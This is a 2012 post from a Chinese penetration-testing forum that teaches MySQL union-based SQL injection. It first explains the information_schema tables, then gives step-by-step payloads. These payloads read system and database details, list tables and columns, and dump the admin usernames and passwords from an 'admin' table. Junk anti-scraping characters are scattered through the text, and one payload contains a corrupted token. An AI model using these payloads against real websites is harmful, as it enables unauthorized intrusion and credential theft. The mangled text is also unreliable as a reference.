中国网络渗透测试联盟

标题: mysql常规注入 [打印本页]

---

作者: admin    时间: 2012-9-13 17:48
标题: mysql常规注入
本文介绍MYSQL盲注的一些语句和方法

+ A; a8 b$ U+ ?2 a& L4 J. }) m; i学习盲注前先了解下 IFORMATION_SCHEMA 库
! [6 M$ a& w9 E* v# @: `" O7 o
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其中记录了Mysql中所有
. z; _4 t. U# ]5 l$ l4 n! u" K5 L0 y0 S存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。
: V7 g7 X9 B* `% i, F8 ~; I1.得到所有数据库名：
|SCHEMATA ->存储数据库名的表
|---字段：SCHEMA_NAME ->数据库名称
- F( k- p8 |1 A
|TABLES ->存储表名
7 W2 Y8 E6 I& m8 N: m|---字段：TABLE_SCHEMA ->表示该表名属于哪个数据库名
* E6 L' @# o. |- Y! @0 A! O$ {  V|---字段：TABLE_NAME ->存储表的表名
. G% }  `# w% G
|COLUMNS ->存储的字段名表
|---字段：TABLE_SCHEMA ->该字段所属数据库名
  y/ C5 q5 k" f- J3 P|---字段：TABLE_NAME ->存储所属表的名称

|---字段：COLUMN_NAME ->该字段的名称
5 |/ B% E' O8 ^5 U, H
/ q) n8 {1 \0 W. C  B
# j5 z7 t2 L4 ~* _! w6 f) [
, ^4 |2 J0 M# a( g5 b###########################################################################

0x001 获取系统信息:
' K  e  `1 B6 H0 N
union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
& [2 I7 Y5 W5 {* l* C
) p+ S+ j* j3 I8 K. Y7 Q  r# T/*
" ?5 ~/ n* ~/ F
. m. T4 C9 L& G% j& H. l6 W& l6 ]@@global.version_compile_os 获取系统版本
; R6 F/ h- G" Z6 D4 Y3 }4 {0 o
@@datadir 数据库路径
% C& Z' K9 `: xdatabase() 当前数据库名称
0x3c62723e 换行HEX值

, }" U1 y3 Q& A) R6 f*/



######################################################################
2 v# Q; F8 K# w+ ~0 ~: ]* S8 \7 k
0x002 获取表名

union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*



2 r$ F% }- B, B' x9 o$ N+ ^/*
# r5 y! Z/ P, P; j! Y2 @$ S
0x67617264656e 为当前数据库名
' H8 u/ }$ d. l
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名

*/

######################################################################
' n5 j/ _- K, _* }
' r/ b/ ~4 {* J2 A1 V) L4 b, |; W

0x003 获取字段

union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*
- h8 J* q* a/ V5 c7 M
% R" a! T$ I& `& h/ t/*
$ O: ?- W) t1 p
; |7 K% s9 X1 p. V! m, V' a6 Lgroup_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段

0x61646d696e ->选择一个表

$ C( }2 U  ^' [! x5 Q2 Q/ ~0x67617264656e ->数据库名

8 X9 v. L) G3 |, F0 j$ U*/

) r5 \& w$ x2 o, o' C2 ~& R#####################################################################
) c: W2 D6 {- z: o* L3 q& d

' ^( B# m! x7 i+ S2 l2 I
0x004 获取数据
5 m( O" n( |6 j! {3 H6 G( g0 A
union select 1,2,3
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin

, U, d/ q% k" m3 [# Z  funion select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
1 a9 i, n+ B* ^$ u: |
' Q' a" i$ e7 V, k% ?9 b6 f+ P

3 [& L' P% X9 `; ?2 C/*

. d: f% Z! e9 t# ^; M0x3c62723e 换行符号HEX编码

. }, z8 K& g6 m% y) v" ?2 F* Y$ sgroup_concat 同时获得该字段所有数据

*/

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2